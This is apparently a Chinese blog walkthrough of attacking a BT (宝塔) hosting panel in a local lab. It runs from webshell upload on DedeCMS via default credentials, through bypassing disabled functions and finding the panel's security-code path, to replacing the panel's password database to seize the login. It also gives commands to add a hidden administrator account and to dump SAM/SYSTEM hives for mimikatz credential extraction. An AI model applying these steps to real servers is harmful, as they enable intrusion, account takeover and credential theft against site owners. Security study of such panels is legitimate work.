大家平时日站的时候最讨厌看到什么？

云盾还是宝塔？ 就我而言是宝塔(碰到的比较多)，所以借用kelper大佬的思路写了一篇对宝塔的渗透实战

搭建集成环境

登录宝塔后台

选择apache控件，等待安装

选择php版本5.6

设置网站信息

记得选择php5.6的版本

安装dedecms

.user.ini文件

控制网站只允许访问的目录

open_basedir="C:/wwwroot/192.168.0.102/;C:/Windows/Temp/;C:/Temp/;C:/BtSoft/temp/session/"
?
.user.ini是lnmp文件，里面放的是你网站的文件夹路径地址。目的是防止跨目录访问和文件跨目录读取.
配置 放在根目录 .user.ini
open_basedir=/项目路径/:/tmp/:/proc/     
?
例：  open_basedir=/www/aaa/:/tmp/:/proc/ 

安装

getshell dedecms

利用默认密码登录后台

上传我们的大马

打开webshell

执行不了命令

宝塔禁用了函数

删除system函数使得可以执行系统命令

成功执行命令

whoami /priv

查看当前权限详细情况

特权信息
----------------------
?
特权名                          描述                       状态  
=============================== ========================== ======
SeAssignPrimaryTokenPrivilege   替换一个进程级令牌         已禁用
SeLockMemoryPrivilege           锁定内存页                 已启用
SeIncreaseQuotaPrivilege        为进程调整内存配额         已禁用
SeTcbPrivilege                  以操作系统方式执行         已启用
SeSecurityPrivilege             管理审核和安全日志         已禁用
SeTakeOwnershipPrivilege        取得文件或其他对象的所有权 已禁用
SeLoadDriverPrivilege           加载和卸载设备驱动程序     已禁用
SeSystemProfilePrivilege        配置文件系统性能           已启用
SeSystemtimePrivilege           更改系统时间               已禁用
SeProfileSingleProcessPrivilege 配置文件单一进程           已启用
SeIncreaseBasePriorityPrivilege 提高计划优先级             已启用
SeCreatePagefilePrivilege       创建一个页面文件           已启用
SeCreatePermanentPrivilege      创建永久共享对象           已启用
SeBackupPrivilege               备份文件和目录             已禁用
SeRestorePrivilege              还原文件和目录             已禁用
SeShutdownPrivilege             关闭系统                   已禁用
SeDebugPrivilege                调试程序                   已启用
SeAuditPrivilege                生成安全审核               已启用
SeSystemEnvironmentPrivilege    修改固件环境值             已禁用
SeChangeNotifyPrivilege         绕过遍历检查               已启用
SeUndockPrivilege               从扩展坞上取下计算机       已禁用
SeManageVolumePrivilege         执行卷维护任务             已禁用
SeImpersonatePrivilege          身份验证后模拟客户端       已启用
SeCreateGlobalPrivilege         创建全局对象               已启用
SeIncreaseWorkingSetPrivilege   增加进程工作集             已启用
SeTimeZonePrivilege             更改时区                   已启用
SeCreateSymbolicLinkPrivilege   创建符号链接               已启用

我们对网站的配置文件进行搜集，看有没有可以利用的密码

方便用于后面的渗透

随机加密的，可利用可能不太大

渗透宝塔的思路

找到宝塔的安装目录，看里面的配置文件，有个配置文件是放着宝塔的安全校验码，也就是ip:8888/qweasdasd这种类型的校验码

还有一种思路，通过把存放宝塔密码的文件替换掉，存放宝塔密码在后缀db的文件下，宝塔的db文件里面为账号，密码（md5值加密，如果无法破解，可以自己加密md5值，之后替换db文件，实现密码重置）记得多翻翻宝塔的配置文件，config下

宝塔关键目录

宝塔面板关键目录解析
2
3
/www/
4
├── backup ---------------------------------------->宝塔面板的备份文件目录
5
│   ├── database------------------------------------>宝塔面板的数据库备份目录
6
│   ├── panel--------------------------------------->宝塔面板配置自动备份目录（6.9.32版本新添加）
7
│   │   └── 2019-10-16------------------------------>宝塔面板配置自动备份的文件，默认是以年月日格式备份，数量为15天
8
│   └── site---------------------------------------->宝塔面板站点备份目录
9
├── server------------------------------------------>宝塔面板服务目录（比较关键）
10
│   ├── data---------------------------------------->mysql数据库服务的目录
11
├── dapao.err----------------------------------->数据库错误日志文件（比较重要，数据库启动不了可以将此日志文件打开，找到最新的日志发给DBA进行分析错误）
12
├── dapao.pid------------------------------->存放数据库pid的文件
13
│   ├── nginx--------------------------------------->nginx的主目录
14
│   │   ├── client_body_temp
15
│   │   ├── conf------------------------------------>nginx的默认配置目录
16
│   │   ├── fastcgi_temp
17
│   │   ├── html
18
│   │   │   ├── 50x.html
19
│   │   │   └── index.html
20
│   │   ├── logs-------------------------------------->nginx的日志目录
21
│   │   │   ├── error.log
22
│   │   │   └── nginx.pid
23
│   │   ├── off
24
│   │   ├── proxy_cache_dir
25
│   │   ├── proxy_temp_dir
26
│   │   ├── rpm.pl
27
│   │   ├── sbin
28
│   │   │   └── nginx-------------------------------->nginx的启动文件
29
│   │   ├── scgi_temp
30
│   │   ├── uwsgi_temp
31
│   │   ├── version.pl
32
│   │   └── waf
33
│   │   ├── config.lua
34
│   │   ├── init.lua
35
│   │   └── waf.lua
36
│   ├── panel----------------------------------------->面板文件目录（最为重要）
37
│   │   ├── BTPanel
38
│   │   ├── class
39
│   │   ├── config
40
│   │   ├── data
41
│   │   ├── default.pl                  存放默认校验码的地方
42
│   │   ├── init.sh
43
│   │   ├── install----------------------------------->面板软件安装脚本路径
44
│   │   │   ├── install_soft.sh
45
│   │   │   ├── lib.sh
46
│   │   │   ├── mysql.sh
47
│   │   │   ├── nginx.sh
48
│   │   │   ├── phpmyadmin.sh
49
│   │   │   ├── php.sh
50
│   │   │   ├── public.sh------------------------------>安装软件主脚本
51
│   │   │   └── pureftpd.sh
52
│   │   ├── license.txt
53
│   │   ├── logs--------------------------------------->面板日志存放目录
54
│   │   │   ├── access.log----------------------------->面板访问日志文件
55
│   │   │   ├── certbot.log
56
│   │   │   ├── error.log-------------------------------->面板错误日志文件
57
（面板打不开或者软件安装不了，可以打开这个文件将最新的日志信息发到宝塔论坛）
58
│   │   │   ├── panel.pid
59
│   │   │   ├── request
60
│   │   │   │   └── 2019-10-16.json
61
│   │   │   └── task.log
62
│   │   ├── rewrite------------------------------------->伪静态存放目录
63
│   │   │   ├── apache---------------------------------->apache默认的伪静态规则目录
64
│   │   │   │   ├── dedecms.conf
65
│   │   │   │   ├── default.conf
66
│   │   │   │   ├── discuzx2.conf
67
│   │   │   │   ├── discuzx3.conf
68
│   │   │   │   ├── discuzx.conf
69
│   │   │   │   ├── ecshop.conf
70
│   │   │   │   ├── EmpireCMS.conf
71
│   │   │   │   ├── list.txt
72
│   │   │   │   ├── mvc.conf
73
│   │   │   │   ├── phpcms.conf
74
│   │   │   │   ├── phpwind.conf
75
│   │   │   │   ├── thinkphp.conf
76
│   │   │   │   ├── wordpress.conf
77
│   │   │   │   └── zblog.conf
78
│   │   │   └── nginx----------------------------------->nginx默认的伪静态规则存放目录
79
│   │   │   ├── dabr.conf
80
│   │   │   ├── dbshop.conf
81
│   │   │   ├── dedecms.conf
82
│   │   │   ├── default.conf
83
│   │   │   ├── discuz.conf
84
│   │   │   ├── discuzx2.conf
85
│   │   │   ├── discuzx3.conf
86
│   │   │   ├── discuzx.conf
87
│   │   │   ├── drupal.conf
88
│   │   │   ├── ecshop.conf
89
│   │   │   ├── emlog.conf
90
│   │   │   ├── EmpireCMS.conf
91
│   │   │   ├── laravel5.conf
92
│   │   │   ├── maccms.conf
93
│   │   │   ├── mvc.conf
94
│   │   │   ├── niushop.conf
95
│   │   │   ├── phpcms.conf
96
│   │   │   ├── phpwind.conf
97
│   │   │   ├── sablog.conf
98
│   │   │   ├── seacms.conf
99
│   │   │   ├── shopex.conf
100
│   │   │   ├── thinkphp.conf
101
│   │   │   ├── typecho2.conf
102
│   │   │   ├── typecho.conf
103
│   │   │   ├── wordpress.conf
104
│   │   │   ├── wp2.conf
105
│   │   │   └── zblog.conf
106
│   │   ├── runconfig.py
107
│   │   ├── runserver.py
108
│   │   ├── runserver.pyc
109
│   │   ├── script----------------------------------------------->面板计划任务备份脚本目录
110
│   │   │   ├── backup
111
│   │   │   ├── backup.py
112
│   │   │   ├── ftp.sh
113
│   │   │   ├── GetOS.sh
114
│   │   │   ├── install.sh
115
│   │   │   ├── logsBackup
116
│   │   │   ├── logsBackup.py
117
│   │   │   └── rememory.sh
118
│   │   ├── ssl-------------------------------------------------->面板证书目录
119
│   │   │   ├── certificate.pem
120
│   │   │   └── privateKey.pem
121
│   │   ├── task.py
122
│   │   ├── tmp
123
│   │   ├── tools.py
124
│   │   ├── tools.pyc
125
│   │   └── vhost------------------------------------------------>站点配置文件目录
126
│   │   ├── apache------------------------------------------->apache 站点配置文件目录
127
│   │   │   ├── 0.default.conf
128
│   │   │   └── dapao.com.conf
129
│   │   ├── cert--------------------------------------------->站点证书目录
130
│   │   ├── nginx-------------------------------------------->nginx站点配置文件目录
131
│   │   │   ├── 0.default.conf
132
│   │   │   ├── dapao.com.conf
133
│   │   │   └── phpfpm_status.conf
134
│   │   ├── rewrite----------------------------------------->站点重定向配置文件目录
135
│   │   │   └── dapao.com.conf
136
│   │   ├── template
137
│   │   │   ├── apache
138
│   │   │   └── nginx
139
│   │   │   ├── anti.conf
140
│   │   │   ├── error_page.conf
141
│   │   │   ├── other.conf
142
│   │   │   ├── proxy.conf
143
│   │   │   ├── redirect.conf
144
│   │   │   └── ssl.conf
145
│   │   ├── tomcat------------------------------------------->tomcat站点配置文件目录
146
│   │   └── wafconf
147
│   │   ├── args
148
│   │   ├── blockip
149
│   │   ├── cookie
150
│   │   ├── denycc
151
│   │   ├── post
152
│   │   ├── returnhtml
153
│   │   ├── url
154
│   │   ├── user-agent
155
│   │   ├── whiteip
156
│   │   └── whiteurl
157
│   ├── php-------------------------------------------------------->php安装目录
158
│   │   └── 54
159
│   ├── phpmyadmin
160
│   ├── pure-ftpd
161
├── wwwlogs-------------------------------------------------------->站点日志目录（当站点打不开或者出错，将最新错误日志发到论坛）
162
│   ├── access.log
163
│   ├── dapao.com.error.log
164
│   ├── dapao.com.log
165
│   ├── nginx_error.log
166
│   └── waf
167
├── wwwroot-------------------------------------------------------->站点根目录
168
│   └── dapao.com
169
│   ├── 404.html
170
│   └── index.html
?

Windows常用命令

whoami查看当前权限
whoami /all 查当前用户在目标系统中的具体权限,这可能会成为你一上来的习惯性动作 ^_^
query user 查当前机器中正在线的用户,注意管理员此时在不在
hostname 查当前机器的机器名,知道当前机器是干啥的
net user查看当前用户列表
net user text查看用户具体信息
net localgroup 查当前机器中所有的组名,了解不同组的职能,如,IT,HR,ADMIN,FILE...
net localgroup "Administrators" 查指定组中的成员列表
添加用户到管理员
net user 用户名 密码 /add
net localgroup administrators 用户名 /add

webshell替换宝塔登录密码

下载出宝塔的登录存放的数据库

校验码的路径：

C:/BtSoft/panel/data/admin_path.pl
C:/BtSoft/panel/data/default.pl
?
//我们就可以组成网址
http://192.168.0.102:8888/rNwgs4dA/

使用

下载下来，SQLiteStudio导入数据库进行查看

密码是md5加密是无法解

获取账号密码

我们替换数据的加密密码，移除数据库，将其此数据库上传

使用修改的密码登录成功

s

windows密码导出

reg save HKLM\SYSTEM Sys.hiv 
reg save HKLM\SAM Sam.hiv
?
导出文件Sys.hiv，Sam.hiv文件
然后mimikatz.exe 执行
lsadump::sam m:Sam.hiv /system:Sys.hiv

windows远程访问控制

打开3389端口